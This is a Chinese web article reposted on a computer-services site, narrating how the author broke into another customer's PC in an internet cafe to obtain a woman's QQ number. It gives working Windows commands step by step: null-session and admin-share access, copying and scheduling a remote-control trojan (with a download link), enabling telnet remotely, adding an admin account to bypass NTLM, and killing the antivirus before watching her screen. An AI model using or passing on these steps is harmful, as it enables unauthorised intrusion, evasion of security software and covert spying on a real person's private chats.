黑客对网吧入侵方法

　　广·西·电·脑·服·务·网　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

　设为首页　

　收藏本站

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

│

　广西电脑服务网 ·广西最大的电脑服务平台

您现在的位置：广西电脑维修在线 >> 黑客安全 >> 黑客安全正文

黑客对网吧入侵方法

作者：未知文章来源：未知点击数：更新时间：2007-1-19 16:03:35

好久都没来网吧了，今天一朋友来找我。外面有下着雪，实在没地方玩，又给溜进了网吧…… 　　在以前家里没买电脑时。
整天都泡这网吧，所以对他的系统设置什么还了解点，都大半年没来了……不知道有啥变化……

　　这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有，呵.，搞入侵可方便了……

　　无意的看到13号坐着两MM，嘻.……入侵也由此开始了，看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下，(偶找了一角落.呵.这样比较安全点..)

　　打开偶可爱的CMD..先net name下看看本机情况

　　WANGLU05

　　USER2000

　　命令成功完成。

　　我本机名是WANGLU05.ping下看看IP有无什么规则

　　Pinging wanglu05 [192.168.0.13] with 32 bytes of data:

　　Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

　　Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

　　Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

　　Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

　　IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

　　这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

　　Pinging WANGLU13 [192.168.0.225] with 32 bytes of data:

　　Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

　　Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

　　Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

　　得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

　　net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...

　　只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

　　G:/>net use //192.168.0.225/ipc$ "" /user:"user04"

　　命令成功完成。

如图1.
　　网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.

　　G:/>net use z: //192.168.0.225/g$

　　命令成功完成。

如图2
　　现在我的电脑里多了一个Z盘...图3.

　　现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了... 这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....

　　下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个

　　web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

　　web控制台

　　一个直接在IE栏里输入对方IP就可以控制对方机器的小软件，也就是所谓的B/S模式的控制。用起来很方便，对方运行了服务端后，你在IE栏里直接输入对方IP就可以控制了，也可以通过刷新来实现重复抓屏。

　　可以在我网络盘里下到

　　http://fhod.ys168.com

　　综合工具里有个 webserver.rar

　　接着

　　G:/>copy webserver.exe //192.168.0.225/admin$

　　已复制 1 个文件。

　　G:/>net time //192.168.0.225

　　//192.168.0.225 的当前时间是 2005/2/5 下午 05:00

　　命令成功完成。

　　

图4
　　G:/>at //192.168.0.225 17:02 webserver.exe

　　用AT命令启动webserver.exe.

　　2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

　　FT....我说那.

　　难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

　　还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 打开控制面板--管理工具--计算机管理

　　操作-连接到另一计算机.

　　然后输入IP192.168.0.225

呵.等一会就可以看到成功了...你看到了什么?

　　更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.

图6

　　OK了...

　　本地打开一cmd

　　输入

　　G:/>telnet 192.168.0.225

　　回车后出现

　　Server allows NTLM authentication only

　　Server has closed connection

图7

　　需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.

　　ntlm.exe在《流光》的Tools目录中有的...

　　没工具怎么办呢..

　　我们在本地添加一和远程主机同样的用户名

　　输入

　　net user user04 /add 添加user04密码为空的用户

　　net localgroup administrators user04 /add 把user04加入管理员组

　　然后来到G:/Winnt/system32下找到CMD.exe

　　右击.创建快捷方式.然后在快捷方式 CMD右击..属性.

　　在以其他用户身份运行前打勾...

图8
　　然后运行
快捷方式 CMD

　　弹出窗口.在用户名处输入user04密码为空

　　

然后

　　telnet 192.168.0.225

　　回车..哈哈...拿到shell了....

　　接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东

　　copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程

　　这下把瑞星给关了.还怕他提示有毒

　　接着执行webserver.exe

　　在IE里输入

　　192.168.0.225

图10

　　看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...

　　好了她的QQ号码也拿到手了..加了她去聊聊去....

上网速度更快更爽、更安全下载使用Firefox火狐浏览器

黑客安全录入：nnyx 责任编辑：nnyx

上一篇黑客安全：如何手动清除恶意网页病毒

下一篇黑客安全：通过3389端口入侵方法

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

Windows Server 2003组策略排障六法	网上炒股安全防范
如何破解电脑密码	网页木马清除方法
中国电脑用户个人上网如何保证网络安全	QQ病毒的特征和清除方法
恶意网站的屏蔽方法	已知病毒分类表
什么是wmi	怎样关闭不安全的常见网络服务
网站安全保护方法	用多种方法隐藏共享访问“入口”
Apache服务器配置安全方法	网上银行电子支付平台的WEB登陆安全性方法
系统安全系列之Windows账户安全设置	数据加密技术
新一代的DDoS攻击方法	如何检测出你电脑中的间谍软件
Windows 2000虚拟主机最安全设置	Windows多种隐藏超级用户方法